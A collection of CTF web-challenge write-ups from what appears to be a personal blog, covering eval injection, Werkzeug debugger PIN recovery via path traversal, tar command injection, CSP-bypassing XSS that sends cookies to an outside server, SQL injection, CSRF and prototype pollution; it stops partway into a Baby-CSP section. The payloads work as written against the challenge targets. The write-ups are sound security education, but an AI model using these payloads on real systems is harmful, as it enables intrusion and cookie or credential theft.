Therefore, if the contents of flag.txt start with the prefix “rarctf{”, then the eval() functions will return 1, and the maas program would return the whole string as a result. If it doesn’t start with that prefix, then the eval() functions would return the string ‘false’ and the if statement that checks the res_type would not return our string. From here, we can just continue to add characters to the prefix to brute-force the value of the flag that way: if we get back our string, then the character we guessed is in the flag. If we get back either “Result is not a number” or “Result is invalid” (or just if the response text has the keyword “Result”), then the character we guessed is not in the flag.

import requests

url = "https://maas.rars.win/calculator"

alphabet = 'abcdefghijklmnopqrstuvwxyz1234567890_-{}'

prefix = 'rarctf{'

#I just chose 40 arbitrarily. If the flag was longer, I would have increased the range.
for index in range(0, 40):
    for c in alphabet:
        # It uses the python builtin function open to retrieve the contents of /flag.txt, then reads it
        # if the contents of said flag.txt contain the prefix (and we add the current character after the prefix), it returns true
        req = "eval(\"1 if (open('../flag.txt','r').read(-1).startswith('" + prefix + c + "')) else 'false'\""
        # I split the string between the n1 and n2 params arbitrarily. It doesnt matter how you split them.
        data = {"mode": "arithmetic", "n1": req, "add": "+", "n2": ")"}
        resp = requests.post(url, data)
        # If we dont find the word "Result" in the response to our request above, then that means the character we guessed is in the flag!
        if (resp.text.find("Result") == -1) and (resp.status_code != 500):
            # Add the correctly guessed character to the string amd move on to the next char
            prefix += c
            print(prefix)
            continue

flag: rarctf{0v3rk1ll_4s_4_s3rv1c3_3fca0faa}

Part 2!

Vie

DEF CON - undoubtedly the most notorious, famous and recgonized CTF out there. Even people who don’t do hacking know about DEF CON. The qualifiers, an event that took place this last weekend, ran for roughly 2 days and had 1 web challenge - which was more like reversing, but I’ll take what I can get.

DEF CON, from someone who thinks she’s wildly out of her depth

Anyone who is anybody in the hacker space knows about DEF CON. It is the top CTF to really form a reputation out of. If you won DEF CON, you’ve found yourself at the top, to say the least. DEF CON has been an established security conference and CTF for years, long before I ever joined the scene. If you ever took a look at my FAQ, you’ll know that being a part of DEF CON in any capacity was a lofty goal of mine. I may like CTFs, but to be on the level where I’m up against other top teams in the DEF CON leaderboard is truly a mark of recognition I would have to earn.

I still have a long way to go, but I am glad that my team and I worked hard to land among the top 25 of DEF CON Qualifiers 2021 edition. This is big for us, given how we are still a recently new team (We only started in Feb of 2019), and we were the only Canadian team to land that good this year. Hopefully, next year, we can work harder to beat our own score! Maybe until then I’ll brush up on my reversing skills so I don’t do nothing for the first day :P

Landing a respectable position among the top 25 teams in DEF CON Quals is still a fact I’m absorbing and attempting to process. I know my team, and I know my team members all work hard and push against their limits to learn and grow. I’m extremely proud of each and every one of them, and certainly, I’m happy at myself for even solving a DEF CON challenge in the first place.

I’d like to think that as I progress in the CTF world, every little victory will be celebrated and recognized. At this same time one year ago, I was thinking to myself how much I needed to do to catch up to both my teammates, and to others in the CTF world who seemed to be a on a level beyond me. I still have quite a bit of climbing to do, but allow me a minute to indulge myself and be proud of what I was able to learn in a short period of time.

Threefactooorx

pic from ooo on twitter

The challenge, threefactooorx involved de-obfuscating some horrid js file and then satisfying the checks that it went through, to grab the flag. Specifically, you had to create an html file that checked all the boxes, and give that html file to an admin entity - who likely has the same extension - and they would send back a screenshot of what the html file looked like, loaded on their end.

Funnily enough, this also seemed like a perfect challenge to practise chrome ndays, but despite thinking about it I didn’t end up doing that - but you could totally do it, if you wanted to.

Source was provided - it was actually a chrome extension you could load into your browser. Like mentioned earlier, the content_script.js was a giant, obfuscated-to-hell JavaScript file that… did stuff.

Well, specifically, it performed some checks that, after trying it out with opening html files locally, would run on each load if it was enabled. Again, the file was obfuscated, but the very last line of the script was interesting.

    nodesadded == 
    0x1 * -0x27a + 0x3 * -0x3f8 + -0x4cd * -0x3 && _0x10b2d5[_0x39523f(-0x157, -0x1ae, -0x17e, -0x1c2)](nodesdeleted, -0x1b66 + -0x14e * 0x8 + 0x25d9) && attrcharsadded == -0x2001 + -0x2 * 0x433 + 0x49 * 0x8e && _0x10b2d5['DvvtZ'](domvalue, -0xed7 * -0x1 + -0x18f0 + 0x12a5) && (document['getElement' + _0x39523f(-0xf2, -0x127, -0x132, -0x153)](_0x5773c7(-0x141, -0x1ab, -0x16f, -0x192) + _0x5773c7(-0x131, -0x15d, -0x10d, -0xc2))['value'] = _0x336e82[_0x5773c7(-0xe7, -0xda, -0x11f, -0x111)]);

What are these local variables? What do they hold?

Now we turn to actually de-obfuscating the damn thing. There was a function, OOO_0x1e05, that we could see throughout the entirety of content_script.js. From the looks of it, it seemed as though OOO_0x1e05 was a custom de-obfuscator that the challenge was using. Based on this, we could regex match and replace many of the complex bits and pieces into readable strings, to make the js somewhat more easy on the eyes. Robert Xiao did the regex matching, and the previous snippet of code above now looks like:

    const _0x10b2d5 = _0x5ebd2a,
        _0xd26915 = {};
    _0xd26915['getflag'] = _0x10b2d5['xOsuT'], chrome['runtime']['sendMessag' + 'e'](_0xd26915, function(_0x336e82) {
        FLAG = _0x336e82['flag'], console.log(_0x10b2d5['KShsG'](_0x10b2d5['bppSB'], _0x336e82['flag']));
        nodesadded == 5 && _0x10b2d5['yRdwv'](nodesdeleted, 3) && attrcharsadded == 23 && _0x10b2d5.DvvtZ(domvalue, 2188) && (document['getElement' + 'ById']('thirdfacto' + 'oor')['value'] = _0x336e82['flag']);
        const _0x369bcb = document['createElem' + 'ent'](_0x10b2d5['SxgOB']);
        _0x369bcb['setAttribu' + 'te']('id', _0x10b2d5.hxkyy), document['body']['appendChil' + 'd'](_0x369bcb);
    });

…Which is, better, at least. I can actually read it and understand what’s going on, and this is what you can glean from this hellcode:

• The extension was, as mentioned earlier, performing checks on the HTML file you visit. These checks see if it was doing the following things under an HTML node with id called 3fa:

  • added 5 nodes
  • deleted 3 nodes
  • had a total attrcharsadded count of 23
  • had a domvalue of 2188

• If the checks above were satisfied it would look for an element called thirdfactooor and give it the value of the flag.

So, in summary, add 5 nodes, delete 3, have some attribute with 23 characters in it, and have a “domvalue” of 2188. The addition and subtraction of HTML nodes is easy enough to do in Javascript, but the other 2 require some explanation: attrcharsadded is a local variable whose value is assigned as so:

 if (_0x55a6f1.qieKm(_0x55a6f1['MRogb'], _0x55a6f1['MRogb'])) attrcharsadded += _0x8a010b['attributeName']['length'];

Hard to fully understand what this code does, but the last part is what to focus on: the length of the attributeName is added to the value of attrcharsadded. This means we need some attribute with a name that is exactly 23 characters to satisfy this attrcharsadded check.

The domvalue is computed in the check_dom function, which has a lot going on:

function check_dom() {
   const _0x525a15 = {};
   _0x525a15.wmicU = function(_0x1a77be, _0x3e38f4) {
       return _0x1a77be(_0x3e38f4);
   }, _0x525a15['ueJYA'] = function(_0x500490, _0x3c0a68) {
       return _0x500490 != _0x3c0a68;
   }, _0x525a15['hJFjw'] = function(_0x410572, _0x33660a) {
       return _0x410572 == _0x33660a;
   }, _0x525a15.KoOZC = '#thirdfactooor', _0x525a15['RkNoD'] = 'INPUT', _0x525a15['QwGfh'] = 'QzIrw', _0x525a15['IKmUR'] = 'cunYq', _0x525a15['TCJdK'] = function(_0xee8465, _0x43b0b6) {
       return _0xee8465 + _0x43b0b6;
   };
   const _0x2c0eff = _0x525a15;
   var _0x1e6746 = document['getElementById']('3fa');
   chilen = _0x1e6746['querySelectorAll']('*')['length'], maxdepth = 0, total_attributes = _0x1e6746['attributes']['length'];
   for (let _0x28c57b of _0x1e6746['querySelectorAll']('*')) {
       d = _0x2c0eff['wmicU'](getDepth, _0x28c57b);
       if (d > maxdepth) maxdepth = d;
       if (_0x28c57b.attributes) total_attributes += _0x28c57b['attributes']['length'];
   }
   specificid = 0;
   _0x2c0eff['ueJYA'](document['querySelector']('[tost="1"]'), null) && (specificid = 1);
   token = 0;
   if (_0x2c0eff['hJFjw'](document['querySelector'](_0x2c0eff['KoOZC'])['tagName'], _0x2c0eff['RkNoD'])) {
       if (_0x2c0eff['QwGfh'] !== _0x2c0eff['IKmUR']) token = 1337;
       else {
           function _0x2351ff() {
               return;
           }
       }
   }
   return totalchars = _0x1e6746['innerHTML']['length'], _0x2c0eff['TCJdK'](_0x2c0eff['TCJdK'](_0x2c0eff['TCJdK'](_0x2c0eff['TCJdK'](chilen, maxdepth) + total_attributes, totalchars), specificid), token);
}

The last return sets the value of domvalue. It essentially sums up everything within 3fa: total_attributes + totalchars + specificid + token + chilen + maxdepth + innerHTML.length + and maybe some other things, that I couldn’t get from the partially de-obfuscated code. That was fine though - because innerHTML.length is added to this value, and we could freely control that to modify domvalue to the number we want.

The final HTML file is below. It’s not pretty.

With all this information, we now needed some way to actually verify and check when we hit the necessary values for all the local variables. This is where the chrome debugger comes in.

Load the extension into your browser and open up an html file that serves as the candidate to satisfy the given checks. Placing breakpoints throughout the content script allowed me to take a look at the local variables and see what values they took:

And I simply repeated this process until the vars had required values needed for the extension to be happy.

Now submit your monster html file to admin, and wait for the picture they send back :)

HTML file below:

<!DOCTYPE html>
<html>
<body>

 <div id="3fa">
 	<input id="thirdfactooor" style="width: 900px;">Poggers</input>

 	<button>button1</button>

 	<div id="nested">	
	 <div id="div2">
	  <p id="p1">You shouldnt see this.</p>
	</div>

	<div id="div3">
	  <p id="p1">You shouldnt see this.</p>
	</div>

	<div id="div4">
	  <p id="p1">You shouldnt see this.</p>
	</div>
 	</div>


</div>



<script>
//this is to get the domval to the necessary amount. It's not pretty :) 
var one = document.createTextNode("oneiuhfiluhfiulfhsjkdnaljdnakldnawkdhaeluifhefiluhwfujnsdkjnslkajfhbeiwlfhewliufhesukfhnksjdfnkje");
var two = document.createTextNode("two;sijlhkugfhhuijlok;jidlsfgkyuadiuhoijpsoIHRUGLKYEADHIOJDSPOSUDGHKSIFUJADKOSDJIHUFSJFAOKDWJISHUGUFAEIJDWFHUSGUFIAJDWEFHUSGYHUEADIJWEFHUSRFEIJADWOEFHUSRFEAJODWEFHUSGRYIUHEFAJDOWEFHUSAIJo");
var thr = document.createTextNode("thriuhygtftgyuhijutydfgukhilkjthghijhhguhijolhkgyfutyfyguhiljokihytyguhijo;ljtjgkhlj;hcguhhfgjkhljhkuashduahduhdiuhee");
var four = document.createTextNode("foukjhgfghjklkjhghjkjhghjklkjhghjklkjklkjhghjklkjklkjhghjklkjklkjhghjklkjhklkjhklkjhghjklr");
var five = document.createTextNode("pleasegivemethefleguwuasdfsssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss");

//add 5 nodes
document.getElementById("3fa").appendChild(one);
document.getElementById("3fa").appendChild(two);
document.getElementById("3fa").appendChild(thr);
document.getElementById("3fa").appendChild(four);
document.getElementById("3fa").appendChild(five);


var d_nested = document.getElementById("nested");
//remove 3 nodes
var remove2 = document.getElementById("div2");
var remove3 = document.getElementById("div3");
var remove4 = document.getElementById("div4");
r2 = d_nested.removeChild(remove2);
r3 = d_nested.removeChild(remove3);
r4 = d_nested.removeChild(remove4);


// attributename = 23 chars
var buttatt1 = document.getElementsByTagName("BUTTON")[0].setAttribute("namenamenamenamenamenam", "pleasegivemetheflag");


</script>

</body>
</html>

Choose among the available animals, and notice a GET query parameter that looks something like ?animal=dogs. What if you gave it text garbage instead of an expected animal?

This is a Werkzeug debugger! What fun, since Werkzeug in development mode will give you a python console with every traceback that is reported to you when something wrong happens. Easy challenge, except -

The console is pin-protected.

The text made me wonder - it seems as though this pin, if such security measures are enabled, has a specific generation algorithm I could reverse. Good thing Werkzeug is open-source.

Truncated to the most relevant parts, and following off of this hacktrick, I realize that the pin generation algorithm isn’t randomized - it’s based on a few environment variables:

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, "__name__", type(app).__name__),
        getattr(mod, "__file__", None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [str(uuid.getnode()), get_machine_id()]

Some of these bits are easy to find - modname is the name of the module in use, which is flask.app. getattr(app, "__name__", type(app).__name__) is just the name of the class in use, which is just Flask. getattr(mod, "__file__", None) wants an absolute path to an app.py file, which we can get from looking at the traceback given to us from before: usr/local/lib/python3.6/dist-packages/flask/app.py.

And on that note, the username value can also be lifted from the traceback by noticing that there is a “loremipsum” directory branch in /home (Thanks, Filip and Jason :P).

So all the public bits are found - what about the private bits? The hacktrick goes into more detail, but the TL;DR is as so: str(uuid.getnode()) wants the MAC address of the machine. get_machine_id() is defined in the source as a function that wants either the machine-id (on linux install) or the boot-id (on, well, boot…duh) of the machine hosting the server.

How do we find such things? They obviously aren’t available to us in public. Maybe if we can do a directory traversal, we can input traversal commands and look through relevant linux files ourselves in order to get this information.

Let’s return once more to the ?animal= query. Again, give it something it doesn’t expect and inspect the traceback/pin-protected console, and see an interesting piece of the traceback:

The f variable seen here is the value of the ?animal= query, passed into an open() function to open a file in the server. This means that our input to the query is treated as a filename. We can do directory traversal through the ?animal= query!

Back to the private bits - we can simply traverse to the relevant linux files to grab the information we want.

MAC address:

?animal=%2F..%2F..%2Fsys/class/net/eth0/address

boot-id:

?animal=%2F..%2F..%2Fproc/sys/kernel/random/boot_id

cgroup (append it to the end of boot-id):

?animal=%2F..%2F..%2Fproc/self/cgroup

NOTE: you’ll need to convert the MAC address from hex to decimal.

NOTE1: trying to get machine-id didn’t work for me, that’s why I got boot-id instead.

NOTE2: boot-id isn’t stable - a new one is generated each time the server restarts. The challenge went down a couple times and the admins had to restart the server throughout, meaning with each time it went back up, I needed the new boot-id.

Altogether, we can modify the source code into a script to generate the pins based on these values we provide it.

probably_public_bits = [ 
  'loremipsum' ,
  'flask.app' , # modname - probably 'flask.app' ?
  'Flask',#getattr (app, '__name__', getattr (app .__ class__, '__name__')), is this just 'Flask'?
  '/usr/local/lib/python3.6/dist-packages/flask/app.py' ##getattr (mod, '__file__', None) 
  ] 

private_bits = [ 
  '2485378547714' , #MAC Address, decimal
  'b875f129-5ae6-4ab1-90c0-ae07a6134578e8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334ae' 
  ## ^^ boot-id + one of the cgroups. 
  ] 

Give the script these hard-coded values and get the pin, provide it to the debugger and now you have a python console ready to go!

b0ctf{Fl4sK_d3buG_is_InseCure}

Vie

The first few web challenges were pretty trivial so I’ll do super quick, 2-sentence descriptions on how to solve them.

Source it!

Inspect source. You’ll find it.

Oinker

Make an oink with the exact same content and realize that each oink has an allocated place in the webpage’s directory. (Example - inputting alert(1); leads to oink endpoint 64). Go to \oink\2 to get the flag.

Fastfox (easy way)

Intended (hard) solution was escalating a JIT bug, which I will definitely research more of so expect part 2 ;) but the easy way was determining what functions were available in the scope of Bob’s jsshell. Some recon shows us that os.system() is in the scope, so os.system('cat flag.txt') gives you the flag.

Tar Inspector

This will mainly be a writeup for the challenge “Tar Inspector”.

The name is self-explanatory: you get a webpage that lets you provide a tar file to it and it’ll extract it to display the contents in a tree structure. A hint was provided that displayed the sanitization function that the filename of your provided file would go through - essentially removing all possible shell metachars, and barring against possible traversal attacks.

# creates a secured version of the filename
def secure_filename(filename):
    # strip extension and any sneaky path traversal stuff
    filename = filename[:-4]
    filename = os.path.basename(filename)
    # escape shell metacharacters
    filename = re.sub("(!|\$|#|&|\"|\'|\(|\)|\||<|>|`|\\\|;)", r"\\\1", filename)
    filename = re.sub("\n", "", filename)
    # add extension
    filename += '__'+hex(randrange(10000000))[2:]+'.tar'
    return filename

…Except, you could put spaces in your filename. Input some file with the filename te st.tar will give it an error, and it’s likely because the space forces the backend to interpret te and st as seperate commands, which will return an error. This tells us something very important - our filename is put into some sort of command line interface - likely a call to GNU tar to actually extract our file. So, if we can use whitespaces in our filename, can we add some arbitrary tar commands?

The answer is yes: inspect the tar man page for a bit and you’ll come across a particularly useful option called --to-command=COMMAND. Its usage is something like:

tar xvf <yourfile.tar> --to-command=bash

And the contents of yourfile.tar could then hold bash commands. The idea is that --to-command=COMMAND will extract the contents of your tar file and pipe it into the standard input of the command you stipulated.

Trying this out with ls for example:

You can see that other files are being added by other people attempting this challenge. So, we have the ability to inject commands into the server, and with that, we can easily get the flag.

Make a simple .txt file to cat the flag: cat /flag.txt. Tar it (uncompressed! I wasted a bunch of time thinking my exploits weren’t working when really it was cause my tar files were compressed) and then submit that to the inspector. All archives exist in the same directory, which is a fact we’ll need for later.

We want to submit another tar file where the filename is a GNU tar command. Since we can access our earlier file, we can reference it (note that the challenge appends a weird randomized suffix to every tar archive you give it, so make sure you include that) and give it the option --to-command=bash. Due to the whole suffix appending issue, use the GNU tar -F option to absorb it. All in all, your second file should have the filename:

yourFirstFileThatHasShellCommandsInIt__XXXXX.tar --to-command=bash -F .tar

Then submit your second tar file (and the contents of the 2nd tar file don’t matter at all. Just needs the right filename).

ayo!

Vie

The challenge takes after justCTF’s similarly named challenge. We’re given an index.js file:

const express = require('express');
const crypto = require("crypto");
const config = require("./config.js");
const app = express()
const port = process.env.port || 3000;

const SECRET = config.secret;
const NONCE = crypto.randomBytes(16).toString('base64');

const template = name => `
<html>

${name === '' ? '': `<h1>${name}</h1>`}
<a href='#' id=elem>View Fruit</a>

<script nonce=${NONCE}>
elem.onclick = () => {
  location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>

</html>
`;

app.get('/', (req, res) => {
  res.setHeader("Content-Security-Policy", `default-src none; script-src 'nonce-${NONCE}';`);
  res.send(template(req.query.name || ""));
})

app.use('/' + SECRET, express.static(__dirname + "/secret"));

app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`)
})

The main difference between Dice’s challenge and justCatTheFish’s is the hashing of the NONCE value. When this script is executed, it sets the NONCE value once, and it doesn’t change values once this server is running.

In justCatTheFish’s challenge, the NONCE value is hashed every time a request is made, sufficiently randomizing the value. However, for this challenge, we can easily get the NONCE value from the content security policy and incorporate it into our input so it will be accepted.

We can do a reflected XSS attack by specifying a ?name= query parameter, so we would inject a script tag in the URL. We need to specify the right NONCE value, which we can see by accessing the page:

And so we format our payload as:

https://babier-csp.dicec.tf/?name=<script+nonce=LRGWAXOY98Es0zz0QOVmag==>document.location='server.com?cookie='%2Bbtoa(document.cookie)</script>

We grab the secret in the cookie and use that value to access the flag.

https://babier-csp.dicec.tf/4b36b1b8e47f761263796b1defd80745/

Missing Flavortext

We are given a single login page, and an index.js file (Some parts omitted to show what is relevant):

const express = require('express');
const bodyParser = require('body-parser');

const app = express();

// parse json and serve static files
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static('static'));

// login route
app.post('/login', (req, res) => {
  if (!req.body.username || !req.body.password) {
    return res.redirect('/');
  }

  if ([req.body.username, req.body.password].some(v => v.includes('\''))) {
    return res.redirect('/');
  }

  // see if user is in database
  const query = `SELECT id FROM users WHERE
    username = '${req.body.username}' AND
    password = '${req.body.password}'
  `;

  let id;
  try { id = db.prepare(query).get()?.id } catch {
    return res.redirect('/');
  }

  // correct login
  if (id) return res.sendFile('flag.html', { root: __dirname });

  // incorrect login
  return res.redirect('/');
});

Earlier we saw that we needed to log in as the user admin, and there’s an sqlite database holding the user credentials. We’re not given much feedback - if we give a set of invalid credentials, or an issue with the database occurs, or the username and password parameters aren’t set, OR either of those parameters contain a ' single quote, we are redirected back to the index. This means that if we try to inject single quotes ourselves to try a classic sqli payload such as ' OR 1=1 in the password parameter, the app would reject it.

However, what’s important to note is the application’s use of its bodyParser, which is operating on extended mode. If you’ve seen my GoogleCTF Pasteurize writeup, then you’d probably know about the flexibility of extended mode and what that means for us here. To summarize, npm’s bodyParser will use the qs library to parse request bodies when in extended mode. The qs library can parse a variety of different objects - not just strings - if they’re formatted a certain way in the request. By default, the contents of the request body will be parsed as strings and treated as such - but if you give a request parameter and specify it to be parsed as an array (using [] notation), it will instead be parsed as an array.

When the program parses through our input, looking for a single quote character, it will parse it differently according to its type. If our input is a string, the functionality of the program will iterate through each character in the string in search of a single quote. But if our input is an array, it will iterate through each element in the array, looking for an element that will exactly match a single quote. We can therefore bypass the single quote check by specifying our password parameter as an array. So, we just need to modify the request body accordingly.

username=admin&password[]=test' OR 1=1--

Without the [] notation, the ' char in our input would fail the check.

Web Utils

The application appears to be a pastebin and also a URL shortener. We’re provided the source as well, and what’s interesting is to note how the application parses our input, which is treated as JSON.

If we create a paste, there’s a front-end script which runs a request to /api/createPaste, which stores our paste into a database.

(async () => {

  await new Promise((resolve) => {
    window.addEventListener('load', resolve);
  });

  document.getElementById('text-form').addEventListener('submit', async (e) => {
    e.preventDefault();
    const text = document.getElementById('text-input').value;
    const res = await (await fetch('/api/createPaste', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        data: text
      })
    })).json();

    if (res.error) {
      return;
    }

    document.getElementById('output').textContent =
      `${window.origin}/view/${res.data}`
  });

})();

Similarly if we make a shortened link, there’s a front-end script that will do the same thing, but instead to /api/createLink.

This seems like a cut and clear xss, with a caveat: when we make a paste, our input is treated as a string and so we won’t be able to inject anything in a string context. Luckily, we can make a link, which in the view.html module will set the window.location to whatever we specify. Here, we can potentially escape out of the string context and execute javascript. However, unluckily, if we try to make a link, the /api/createLink endpoint has an additional check not present in the paste endpoint:

...

  fastify.post('createLink', {
    handler: (req, rep) => {
      const uid = database.generateUid(8);
      const regex = new RegExp('^https?://');
      if (! regex.test(req.body.data))
        return rep
          .code(200)
          .header('Content-Type', 'application/json; charset=utf-8')
          .send({
            statusCode: 200,
            error: 'Invalid URL'
          });

...

If our data doesn’t start with https?:// then we recieve an error. So, ideally, we would want the freedom of /api/createPaste combined with the freedom of how view.html renders links.

We can combine the two by sending a POST request to /api/createPaste, but malform our request body to override the type parameter, which dictates whether our input is a paste or a link. Luckily, the request processing is done client-side, so we can freely add additional items into the JSON data.

You can use Burpsuite or a browser that allows request editing to do this.

{"data":"javascript:alert(1);", "type": "link"}

With this as our request body, we can retrieve the created “paste/link” id and visit the webpage to see that our code is correctly interpreted as javascript. We can report our “paste/link” to the admin bot and grab their cookie, which has the flag.

Build a Better Panel

A derivative of another challenge called “Build a Panel”, but harder. The website is a “widget” panel, which appear to work using “embedly” cards. There’s already an example of a panel from reddit. The challenge also gave us an admin bot to report URLs to, so this may be another xss challenge.

…With a few caveats. First, the admin bot only visits sites matching the following regex: ^https:\/\/build-a-better-panel\.dicec\.tf\/create\?[0-9a-z\-\=]+$

Second, the CSP in the application is pretty strict:

default-src 'none'; script-src 'self' http://cdn.embedly.com/; style-src 'self' http://cdn.embedly.com/; connect-src 'self' https://www.reddit.com/comments/;

And so there are a few issues that would need to be addressed before “Build a Better Panel” can be solved. With that being said, I’m pretty sure it’s better to take a look at the first challenge, “Build a Panel”, first.

Build a Panel

The first challenge is roughly the same code but the admin bot doesn’t have the same regex check. So, the solution for both challenges may involve much of the same steps.

We can examine source and find this interesting function (also present in “build a better panel”):

app.get('/admin/debug/add_widget', async (req, res) => {
    const cookies = req.cookies;
    const queryParams = req.query;

    if(cookies['token'] && cookies['token'] == secret_token){
        query = `INSERT INTO widgets (panelid, widgetname, widgetdata) VALUES ('${queryParams['panelid']}', '${queryParams['widgetname']}', '${queryParams['widgetdata']}');`;
        db.run(query, (err) => {
            if(err){
                console.log(err);
                res.send('something went wrong');
            }else{
                res.send('success!');
            }
        });
    }else{
        res.redirect('/');
    }
});

The endpoint is a special admin api call that inserts a widget into the widget table. In order to prevent non-admins from accessing the functionality of this call, a token value extracted from the visitor’s cookies are compared to some secret_token value, which presumably only the admin has. But we can still get unintentional access by tricking an admin into visiting this endpoint without them knowing - executing a CSRF attack.

Specifically, a CSRF attack to execute an SQL injection. Since the endpoint constructs a query to add a widget into the database, we need to format our CSRF attack to include an SQLi payload. So, what are we trying to do with the database to perform SQLi on?

In the source exists another table, called “flag”:

query = `CREATE TABLE IF NOT EXISTS flag (
    flag TEXT
)`;
db.run(query, [], (err) => {
    if(!err){
        let innerQuery = `INSERT INTO flag SELECT 'dice{fake_flag}'`;
        db.run(innerQuery);
    }else{
        console.error('Could not create flag table');
    }
});

So this is our SQLi target: we want to run rogue SQL commands through the /admin/debug/add_widget endpoint, to access the “flag” table. We have an input, now we just need an output.

Since the query parameters in the /admin/debug/add_widget endpoint are unsanitized, we inject SQL into there - specifically through the panelId query:

', (SELECT * FROM flag), '{"type":"whatever"}');--

So the final URL to report to admin is this:

https://build-a-panel.dicec.tf/admin/debug/add_widget?panelid=112ad5ea-5583-4818-be4b-d1eb03ac3002', (SELECT * FROM flag), '{"type":"whatever"}');--&widgetname=0&widgetdata=0

And we just need to reload our panel and get the flag.

Prototype Pollution sans __proto__

Let’s return to “Build A Better Panel”.

Reading through the source, something immediately catches my eye, in the custom.js file:

const mergableTypes = ['boolean', 'string', 'number', 'bigint', 'symbol', 'undefined'];

const safeDeepMerge = (target, source) => {
    for (const key in source) {
        if(!mergableTypes.includes(typeof source[key]) && !mergableTypes.includes(typeof target[key])){
            if(key !== '__proto__'){
                safeDeepMerge(target[key], source[key]);
            }
        }else{
            target[key] = source[key];
        }
    }
}

This is a function that merges 2 js objects together. Typically, JSON merges like this function are prime targets for a vulnerability known as prototype pollution, an exploit unique to javascript that leverages the functionality of the prototype-based language. To summarize, one can modify the prototype properties of an object and pollute every object inheriting from that same prototype in javascript with the keyword __proto__.

Unfortunately, this is a slightly safer merge since the function explicitly looks out for the __proto__ keyword. The __proto__ keyword is an object property that accesses the Object.prototype of a js object literal. safeDeepMerge will be iterating through the keys of a given JSON parameter looking for it, so we need to access Object.prototype in a different way. Unfortunately, we can’t just straight up input Object.prototype because of the value mergableTypes - among that list, Object is not one of them, so safeDeepMerge will bypass Object too. However, Object itself can be accessed without explicitly declaring it. You can specify an instance of the basic javascript object with the constructor method. Therefore, constructor.prototype = Object.prototype = __proto__. We can use constructor.prototype to bypass safeDeepMerge!

How can we use this to our advantage? In the widget panel, there’s an example widget of a reddit page using embedly. Doing some googling leads us to discover that prototype pollution through the embedly script is possible!

I’ll skip the parts where I banged my head against the wall for a long time trying to use prototype pollution to craft an XSS payload on the page. The problem with that was the strict CSP, which was the same one as “Build A Panel”:

default-src 'none'; script-src 'self' http://cdn.embedly.com/; style-src 'self' http://cdn.embedly.com/; connect-src 'self' https://www.reddit.com/comments/;

In short, I can’t execute anything since the script-src is either self or from embedly.com. So what now?

Let’s take a look at the regex that the admin bot has again: ^https:\/\/build-a-better-panel\.dicec\.tf\/create\?[0-9a-z\-\=]+$

The endpoint in question is outlined below:

 app.get('/create', (req, res) => {
    const cookies = req.cookies;
    const queryParams = req.query;

    if(!cookies['panelId']){
        const newPanelId = queryParams['debugid'] || uuidv4();
    
        res.cookie('panelId', newPanelId, {maxage: 10800, httponly: true, sameSite: 'strict'});
    }

    res.redirect('/panel/');
});

app.get('/panel/', (req, res) => {
    const cookies = req.cookies;

    if(cookies['panelId']){
        res.render('pages/panel');
    }else{
        res.redirect('/');
    }
});

/create accepts one query, debugId, which renders a pages/panel when provided. In there, the custom.js file is loaded, which features the safeDeepMerge function. So, if we can create some specific widget that uses prototype pollution to execute rogue code, then we can just send that widget’s debugId to the admin and get the flag!

Combining it all

So, we can have an admin take a look at a specific panel using /create?debugId=x and we can craft that panel to execute rogue code based on abusing the functionality of safeDeepMerge to execute prototype pollution. We just need to combine the payload from “Build a Panel” with a payload that constructs a widget executing the pollution, and grab that widget’s debugId so the admin will visit it.

So, we simply need to add a new panel with our payload:

{"widgetName":"constructor","widgetData":"{\"prototype\":{\"srcdoc\":\"<script src='https://jamvie.net/admin/debug/add_widget?panelid=vie99vie&widgetname=whatev&widgetdata='),('vie99vie', (select flag from flag), '{"type":"whatev"}') --

Once we file this request, we just have to report to the admin the url https://build-a-better-panel.dicec.tf/create/?debugId=vie99vie and check back to our panel to retrieve the flag.

This was quite the challenge, which involved a lot of working parts and required me to test the depth of my knowledge on classic, established web exploits. I learned alot, and while I may have taken a while in wrapping my head around it, I’m glad I was able to understand it eventually.

Vie

Forgotten Name

I found this on a total fluke. I wasn’t paying attention to the challenge much but the description was compelling:

I’m hesitant to attempt to nmap all known domains of justCatTheFish’s network, and so instead thought about the nature of their subdomains. Every other challenge that required accessing a server was suffixed with the subdomain *.jctf.pro. I decided to search through certificate transparency logs with that subdomain to see what would come up, and a certain URL caught my eye: 6a7573744354467b633372545f6c34616b735f6f3070737d.web.jctf.pro/. It had the correct beginning characters and it ended in jctf.pro, and visiting it we see a small message: “OH! You found it! Thank you <3”.

So, the secret domain has been found. Hex decoding the mash of numbers in the URL gave the flag: justCTF{c3rT_l4aks_o0ps}.

Computeration

This challenge was labelled as hard but it had an unintended solution. The challenge featured a note repository and the ability to report URLs to admins - basic XSS stuff. However, the notes were stored in our browser’s localStorage, which is unique per domain and session, and likely doesn’t involve cookies due to this. Looking at this, my first thought came to XS-leaks (a web vulnerability I’m currently studying and researching), which would essentially side-channel attack a user in their browser to leak information based on functionality and logic of the program.

During recon, I spun up a quick server and gave the URL to the bot to check out. When they made the request, I inspected the headers:

I don’t typically see the referer header in many requests, because there are inherent security concerns with using it. Out of curiosity I tried to access the referer site myself, and unintentionally got the flag that way.

The key is in the response headers I recieved after visiting the domain. Their referrer-policy header was set to no-referer, which is a mispelling of no-referrer. Confusingly, the referer request header is misspelled - which is a different story. When the admin bot begins to fire a request to a URL we specify, its domain’s referrer-policy will be set to unsafe-url since no-referer technically doesn’t match any of its options. Therefore, the referer request header is added to the bot’s GET request to our URL.

Although unintended, still a good discussion on the security of referrer headers. Looking at the flag also validated my suspicions of this challenge’s intended solution requiring XS-leaks.

Baby-CSP

I was primarily focused on this challenge. We see some interesting PHP code right away upon visiting it:

<?php
require_once("secrets.php");
$nonce = random_bytes(8);

if(isset($_GET['flag'])){
 if(isAdmin()){
    header('X-Content-Type-Options: nosniff');
    header('X-Frame-Options: DENY');
    header('Content-type: text/html; charset=UTF-8');
    echo $flag;
    die();
 }
 else{
     echo "You are not an admin!";
     die();
 }
}

